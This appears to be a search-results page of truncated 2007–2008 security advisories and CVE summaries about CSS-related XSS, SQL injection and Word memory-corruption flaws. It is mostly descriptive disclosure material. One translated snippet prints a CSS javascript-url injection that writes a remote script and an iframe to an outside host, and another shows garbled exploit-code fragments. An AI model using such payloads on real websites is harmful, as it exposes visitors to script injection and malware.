5712 matches found
[SECURITY] Fedora 7 Update: roundcubemail-0.2-0.alpha.fc7.1
RoundCube Webmail is a browser-based multilingual IMAP client with an application-like user interface. It provides full functionality you expect from an e-mail client, including MIME support, address book, folder manipulation, message searching and spell checking. RoundCube Webmail is written in...
erfurtwiki-lfi.txt
C.H.R.O.O.T. SECURITY GROUP http://www.chroot.org Hacks In Taiwan Conference 2008 http://www.hitcon.org Title: ErfurtWiki = R1.02b css Local...
Cross site scripting
Multiple cross-site scripting (XSS) vulnerabilities in F5 FirePass SSL VPN 6.0.2 hotfix 3, and possibly earlier versions, allow remote attackers to inject arbitrary web script or HTML via quotes in (1) the cssexceptions parameter in vdesk/admincon/webyfiers.php and (2) the sqlmatchscope parameter in...
CVE-2008-2637
Multiple cross-site scripting (XSS) vulnerabilities in F5 FirePass SSL VPN 6.0.2 hotfix 3, and possibly earlier versions, allow remote attackers to inject arbitrary web script or HTML via quotes in (1) the cssexceptions parameter in vdesk/admincon/webyfiers.php and (2) the sqlmatchscope parameter in...
iDefense Security Advisory 05.13.08: Microsoft Word CSS Processing Memory Corruption Vulnerability
iDefense Security Advisory 05.13.08 http://labs.idefense.com/intelligence/vulnerabilities/ May 13, 2008. I. BACKGROUND: Microsoft Word is a word processing application that is distributed with Microsoft Office. Cascading Style Sheets (CSS) is a stylesheet language used to describe the presentation of...
Microsoft Word multiple security vulnerabilities
Memory corruption on RTF parsing, memory corruption on CSS parsing...
CVE-2008-1434
CVE-2008-1434 describes a remote code execution vulnerability in Microsoft Word caused by a memory handling error when processing a Word file containing a malformed CSS value. The issue affects Word across multiple products/versions (Office 2000 SP3, Word 2000; Word XP SP3; Word 2003 SP2/SP3; Wor...
Microsoft Word Cascading Style Sheet Processing Code Execution (MS08-026; CVE-2008-1434)
Microsoft Word is a popular word processing software. A remote code execution vulnerability has been identified in Microsoft Word. A remote attacker could exploit this issue via a malformed Word file. The vulnerability is due to a memory calculation error in Microsoft Word that fails to properly...
miniBB 2.2 (CSS/SQL/FPD) Multiple Remote Vulnerabilities
No description provided by source. Author: GiReX Homepage: girex.altervista.org Date: 21/04/2008 CMS: miniBB 2.2 and maybe prior Site: minibb.net Bug 1: Full Path Disclosure Bug 2: Cross Site Scripting Bug 3: Remote SQL Injection Need: registerglobals = On...
Cross site scripting
Cross-site scripting (XSS) vulnerability in the private message feature in Nuke ET 3.2 and 3.4, when using Internet Explorer, allows remote authenticated users to inject arbitrary web script or HTML via a CSS property in the STYLE attribute of a DIV element in the mensaje parameter. NOTE: some of...
CVE-2008-1873
Cross-site scripting (XSS) vulnerability in the private message feature in Nuke ET 3.2 and 3.4, when using Internet Explorer, allows remote authenticated users to inject arbitrary web script or HTML via a CSS property in the STYLE attribute of a DIV element in the mensaje parameter. NOTE: some of...
CVE-2008-1873
CVE-2008-1873 is a cross-site scripting (XSS) vulnerability in Nuke ET’s private message feature affecting Nuke ET 3.2 and 3.4. The flaw allows remote authenticated users to inject arbitrary script/HTML via a CSS property in the STYLE attribute of a DIV element within the mensaje parameter, with ...
SA-2008-015 - Comment Upload - Arbitrary file upload
Comment upload enables file attachments for comments. To do so it uses and subverts various functions from the upload module that are present in Drupal core. In certain, common cases, comment upload passes incorrect data to the upload validation functions, resulting in a validation bypass, which...
Use CSS hung it using the method!- Vulnerability warning-the black bar safety net
Inserted into the css or the head of the style can be... If the plug portion of the style in this writing style type="text/css" !-- body background-image: url'javascript:document.write"script src=aa.js/script"' -- /style Call the aa.js content document.write"iframe src=http://www.winshell.c...
seagull-063-xss.txt
fuzion. Product: Seagull STABLE 0.6.3 http://seagullproject.org/ Vulnerable: Seems that none of the theme css renderers sanitize...
domphp-admin.txt
126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.=" ".dechexord$string$i; else $exa.=" 0".dechexord$string$i; $cont++;if $cont==15 $cont=0; $result.="\r\n"; $exa.="\r\n"; return $exa."\r\n".$result; $proxyregex = '\b\d1,3.\d1,3.\d1,3.\d1,3:\d1,5\b'; function...
CVE-2007-6656
SQL injection vulnerability in contentcss.php in the TinyMCE module for CMS Made Simple 1.2.2 and earlier allows remote attackers to execute arbitrary SQL commands via the templateid parameter...
CVE-2007-6529
Multiple unspecified vulnerabilities in TikiWiki before 1.9.9 have unknown impact and attack vectors involving (1) tiki-editcss.php, (2) tiki-listgames.php, or (3) tiki-g-adminsharedsource.php...
From the Baidu space to China blog vulnerability-vulnerability warning-the black bar safety net
These days there are always friends to ask me in ten period of black anti-on introduction to ajax hacking degree of influence exactly how much, and how for this stage of the network status of the web2. 0 vulnerability testing, and use of, this time by means of black anti-for everyone to see for...